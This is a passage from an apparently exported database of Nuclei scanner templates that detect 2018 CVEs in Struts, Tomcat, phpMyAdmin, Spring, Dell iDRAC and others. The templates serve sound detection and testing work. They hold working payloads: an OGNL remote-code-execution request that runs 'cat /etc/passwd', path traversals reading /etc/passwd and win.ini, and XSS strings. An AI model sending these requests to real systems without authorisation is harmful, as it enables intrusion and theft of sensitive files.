'{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022020b9433d2689cd1c916656c6593704d52cdc82d3cae348cb23bbd6b903fa6e4102210093789a3005ae04750511962961e6ce2b78f9e2bdb3cd2d6871867fa439c29424:922c64590222798bb761d5b6d8e72950", "hash": "565fb33098b471c1542bbd61ec55cdb5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308031" }, "name": "CVE-2018-11759.yaml", "content": "id: CVE-2018-11759\n\ninfo:\n name: Apache Tomcat JK Connect <=1.2.44 - Manager Access\n author: harshbothra_\n severity: high\n description: |\n Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.\n impact: |\n Unauthenticated attackers can gain unauthorized access to the Apache Tomcat Manager interface, potentially leading to further compromise of the server.\n remediation: |\n Upgrade to a patched version of Apache Tomcat JK Connect (1.2.45 or higher) or apply the recommended security patches.\n reference:\n - https://github.com/immunIT/CVE-2018-11759\n - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E\n - https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11759\n - https://access.redhat.com/errata/RHSA-2019:0366\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-11759\n cwe-id: CWE-22\n epss-score: 0.96552\n epss-percentile: 0.99592\n cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: tomcat_jk_connector\n shodan-query: title:\"Apache Tomcat\"\n tags: cve2018,cve,apache,tomcat,httpd,mod-jk\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/jkstatus'\n - '{{BaseURL}}/jkstatus;'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"JK Status Manager\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022041afb53374b858558cfa721e985551966ce7288cec93b493945ea139d7386f8402205f4e5b293d6960714f5f73b027b4e94ae9e1807296b861ed9b23392772a3be60:922c64590222798bb761d5b6d8e72950", "hash": "33bc9a10e73bfc9fd9bceb7612fbc2ff", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308032" }, "name": "CVE-2018-11776.yaml", "content": "id: CVE-2018-11776\n\ninfo:\n name: Apache Struts2 S2-057 - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - https://github.com/jas502n/St2-057\n - https://cwiki.apache.org/confluence/display/WW/S2-057\n - https://security.netapp.com/advisory/ntap-20180822-0001/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11776\n - http://packetstormsecurity.com/files/172830/Apache-Struts-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-11776\n cwe-id: CWE-20\n epss-score: 0.97517\n epss-percentile: 0.99985\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve,cve2018,packetstorm,apache,rce,struts,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ab1c51e0504628fe004acf4adeb03221ca6e19060ece841c357bd983b6d698760221009d5e783a014ec2025efc6cb4589970bba73805b98312143cd27a9ac719bdee2c:922c64590222798bb761d5b6d8e72950", "hash": "fb254dd74abb207ec6f60f5720033cb7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308033" }, "name": "CVE-2018-11784.yaml", "content": "id: CVE-2018-11784\n\ninfo:\n name: Apache Tomcat - Open Redirect\n author: geeknik\n severity: medium\n description: |\n Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.\n impact: |\n An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Upgrade to Apache Tomcat version 9.0.12 or later, or apply the relevant patch provided by the Apache Software Foundation.\n reference:\n - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11784\n - http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.html\n - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.html\n - http://packetstormsecurity.com/files/163456/Apache-Tomcat-9.0.0M1-Open-Redirect.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n cvss-score: 4.3\n cve-id: CVE-2018-11784\n cwe-id: CWE-601\n epss-score: 0.83718\n epss-percentile: 0.98183\n cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: tomcat\n shodan-query: title:\"Apache Tomcat\"\n tags: cve,cve2018,packetstorm,tomcat,redirect,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}//interact.sh\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n - type: status\n negative: true\n status:\n - 404\n# digest: 4a0a00473045022056187efc1263a71f2d8b32f9de3c5f204e1f0e14a74e5c6414adcc71e2baef0f022100c535f4d342896061392e41c1198b95e62d3934b01628ac2a8a8bfdd16547d8ed:922c64590222798bb761d5b6d8e72950", "hash": "3d07ee336df82361fc61055a07d95ee0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308034" }, "name": "CVE-2018-12031.yaml", "content": "id: CVE-2018-12031\n\ninfo:\n name: Eaton Intelligent Power Manager 1.6 - Directory Traversal\n author: daffainfo\n severity: critical\n description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability.\n reference:\n - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion\n - https://www.exploit-db.com/exploits/48614\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12031\n - https://github.com/0xT11/CVE-POC\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-12031\n cwe-id: CWE-22\n epss-score: 0.00725\n epss-percentile: 0.80248\n cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eaton\n product: intelligent_power_manager\n tags: cve,cve2018,edb,lfi,eaton\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd\"\n - \"{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"\\\\[(font|extension|file)s\\\\]\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ab34469cfcefff232919bd56d0ecb10087647817db9eba51fae678e7630e51e002202f79da64c606d1225444596f885702817709284e378c496818f3ee1144ce6188:922c64590222798bb761d5b6d8e72950", "hash": "671d6256ca4ec6a5e34b1ff97ef2f509", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308035" }, "name": "CVE-2018-12054.yaml", "content": "id: CVE-2018-12054\n\ninfo:\n name: Schools Alert Management Script - Arbitrary File Read\n author: wisnupramoedya\n severity: high\n description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script.\n reference:\n - https://www.exploit-db.com/exploits/44874\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12054\n - https://github.com/unh3x/just4cve/issues/4\n - https://www.exploit-db.com/exploits/44874/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-12054\n cwe-id: CWE-22\n epss-score: 0.36029\n epss-percentile: 0.9677\n cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: schools_alert_management_script_project\n product: schools_alert_management_script\n tags: cve,cve2018,lfi,edb,schools_alert_management_script_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/img.php?f=/./etc/./passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100909d49cf51c1283f77ba2b94390ec551a381726ad24bc74122062cdf6ef9d80d02206aa868f2e0d240bebc71f4ce6fca02e97592a2b0c377d466545fb0b3d1cb715d:922c64590222798bb761d5b6d8e72950", "hash": "69883489ffbd5a6dfc5852135e57c5ea", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308036" }, "name": "CVE-2018-1207.yaml", "content": "id: CVE-2018-1207\n\ninfo:\n name: Dell iDRAC7/8 Devices - Remote Code Injection\n author: dwisiswant0\n severity: critical\n description: |\n Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability\n which could be used to execute remote code. A remote unauthenticated attacker may\n potentially be able to use CGI variables to execute remote code.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware updates provided by Dell to mitigate this vulnerability.\n reference:\n - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf\n - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1207\n - http://en.community.dell.com/techcenter/extras/m/white_papers/20485410\n - https://twitter.com/nicowaisman/status/977279766792466432\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1207\n cwe-id: CWE-94\n epss-score: 0.01875\n epss-percentile: 0.88144\n cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dell\n product: emc_idrac7\n tags: cve2018,cve,dell,injection,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/login?LD_DEBUG=files\"\n\n matchers:\n - type: word\n part: response\n words:\n - \"calling init: /lib/\"\n# digest: 4a0a00473045022100aecfe41ed529d979eb0d5e85bcb47766d58e166f2a3001bdd425be15bae9f33302204dbc7bef9234de5be6f16d334ac21107b1381db5dd0d893a75aeaf8a596b5b77:922c64590222798bb761d5b6d8e72950", "hash": "b86c2bafe114482b2648fcb97647b65f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308037" }, "name": "CVE-2018-12095.yaml", "content": "id: CVE-2018-12095\n\ninfo:\n name: OEcms 3.1 - Cross-Site Scripting\n author: LogicalHunter\n severity: medium\n description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/44895\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095\n - https://cxsecurity.com/issue/WLB-2018060092\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12095\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2018-12095\n cwe-id: CWE-79\n epss-score: 0.00333\n epss-percentile: 0.70604\n cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oecms_project\n product: oecms\n tags: cve2018,cve,xss,edb,oecms_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206cbd123e860c5657ebdbbfa98574fb5663ab2209adc3b40b143af0bad366355e022100db1434e013133eadf65a81ddda4ff57c1d48bfdd5f490d4252d757ede09fd48d:922c64590222798bb761d5b6d8e72950", "hash": "f1538b2e5313c84b96ac815ba4dae84f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308038" }, "name": "CVE-2018-12296.yaml", "content": "id: CVE-2018-12296\n\ninfo:\n name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure\n author: princechaddha\n severity: high\n description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.\n impact: |\n An attacker can gain sensitive information about the server, potentially leading to further attacks.\n remediation: |\n Upgrade to a patched version of Seagate NAS OS.\n reference:\n - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12296\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-12296\n cwe-id: CWE-732\n epss-score: 0.01442\n epss-percentile: 0.86338\n cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: seagate\n product: nas_os\n tags: cve,cve2018,seagate,nasos,disclosure,unauth\n\nhttp:\n - raw:\n - |\n POST /api/external/7.0/system.System.get_infos HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}\n\n matchers:\n - type: word\n part: body\n words:\n - '\"version\":'\n - '\"serial_number\":'\n condition: and\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '\"version\": \"([0-9.]+)\"'\n part: body\n# digest: 4a0a00473045022060c783658faf40b7f9a34361eed36da0f94e1675b8f33ff246b9f4aeb1fb5154022100c74444ed55f597dff4be9289ccea933ff13cd951323438b922cd89b639507c63:922c64590222798bb761d5b6d8e72950", "hash": "55ef15fe2b8b230ac787f1094ae2e6cf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308039" }, "name": "CVE-2018-12300.yaml", "content": "id: CVE-2018-12300\n\ninfo:\n name: Seagate NAS OS 4.3.15.1 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.\n impact: |\n Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware.\n remediation: |\n Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1.\n reference:\n - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12300\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-12300\n cwe-id: CWE-601\n epss-score: 0.00118\n epss-percentile: 0.45685\n cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: seagate\n product: nas_os\n tags: cve2018,cve,redirect,seagate,nasos\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950", "hash": "59cbd5cf766df5415c76df1c73ddbd5b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803a" }, "name": "CVE-2018-12613.yaml", "content": "id: CVE-2018-12613\n\ninfo:\n name: PhpMyAdmin <4.8.2 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Upgrade PhpMyAdmin to version 4.8.2 or later to fix the vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613\n - https://www.phpmyadmin.net/security/PMASA-2018-4/\n - https://www.exploit-db.com/exploits/44928/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12613\n - https://security.gentoo.org/glsa/201904-16\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2018-12613\n cwe-id: CWE-287\n epss-score: 0.97392\n epss-percentile: 0.99908\n cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phpmyadmin\n product: phpmyadmin\n tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009efa0514463053230c63b5f90705314d9e80a1a472ea48bb9da85b5c9779ee6402206c0ec7976f0ef1416debde9235f1b2a274324bd6782667980cd9288d6c90b06b:922c64590222798bb761d5b6d8e72950", "hash": "a95cc1978a2a4bdb211a979d573bdf87", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803b" }, "name": "CVE-2018-12634.yaml", "content": "id: CVE-2018-12634\n\ninfo:\n name: CirCarLife Scada <4.3 - System Log Exposure\n author: geeknik\n severity: critical\n description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.\n impact: |\n An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability.\n reference:\n - https://circontrol.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12634\n - https://www.seebug.org/vuldb/ssvid-97353\n - https://www.exploit-db.com/exploits/45384/\n - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-12634\n cwe-id: CWE-200\n epss-score: 0.95531\n epss-percentile: 0.99245\n cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: circontrol\n product: circarlife_scada\n tags: cve,cve2018,scada,circontrol,circarlife,logs,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html/log\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"CirCarLife Scada\"\n\n - type: word\n words:\n - \"user.debug\"\n - \"user.info\"\n - \"EVSE\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ed0b29ad551cb1c8046e44ccfeb468882574d4d84131408c68bd1df5afd26cfa022075bd7e7320c9c33dad093dd40822990e12fc84791e76510619255948ce4ba1cd:922c64590222798bb761d5b6d8e72950", "hash": "50ec33432b2b3fc89c499c026b1e471c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803c" }, "name": "CVE-2018-12675.yaml", "content": "id: CVE-2018-12675\n\ninfo:\n name: SV3C HD Camera L Series - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability.\n reference:\n - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory\n - https://vuldb.com/?id.125799\n - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12675\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-12675\n cwe-id: CWE-601\n epss-score: 0.00118\n epss-percentile: 0.44971\n cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sv3c\n product: h.264_poe_ip_camera_firmware\n tags: cve,cve2018,redirect,sv3c,camera,iot\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'\n\n matchers:\n - type: word\n part: body\n words:\n - ''\n# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950", "hash": "9a8f34ff6a06ac984fccd021e29dea52", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803d" }, "name": "CVE-2018-1271.yaml", "content": "id: CVE-2018-1271\n\ninfo:\n name: Spring MVC Framework - Local File Inclusion\n author: hetroublemakr\n severity: medium\n description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability.\n reference:\n - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d\n - https://pivotal.io/security/cve-2018-1271\n - https://access.redhat.com/errata/RHSA-2018:1320\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1271\n - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 5.9\n cve-id: CVE-2018-1271\n cwe-id: CWE-22\n epss-score: 0.004\n epss-percentile: 0.73113\n cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: vmware\n product: spring_framework\n tags: cve,cve2018,spring,lfi,traversal,vmware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'\n - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'for 16-bit app support'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022029c3380bdfd5118230de31f228fa1f4e5f2888d9bd277fe8ac5d3a84562a79f5022036b5eb64e2ed0675f3fc8179c9692ed6a466c35c7e8f0af65d4256edaec216c9:922c64590222798bb761d5b6d8e72950", "hash": "494155d026c6c9f9b4ae06518124b28b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803e" }, "name": "CVE-2018-1273.yaml", "content": "id: CVE-2018-1273\n\ninfo:\n name: Spring Data Commons - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,\n and older unsupported versions, contain a property binder vulnerability\n caused by improper neutralization of special elements.\n An unauthenticated remote malicious user (or attacker) can supply\n specially crafted request parameters against Spring Data REST backed HTTP resources\n or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by the vendor to fix the deserialization vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1273\n - https://pivotal.io/security/cve-2018-1273\n - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E\n - https://www.oracle.com/security-alerts/cpujul2022.html\n - https://github.com/2lambda123/SBSCAN\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1273\n cwe-id: CWE-20,CWE-94\n epss-score: 0.97515\n epss-percentile: 0.99982\n cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: pivotal_software\n product: spring_data_commons\n tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software\n\nhttp:\n - raw:\n - |\n POST /account HTTP/1.1\n Host: {{Hostname}}\n 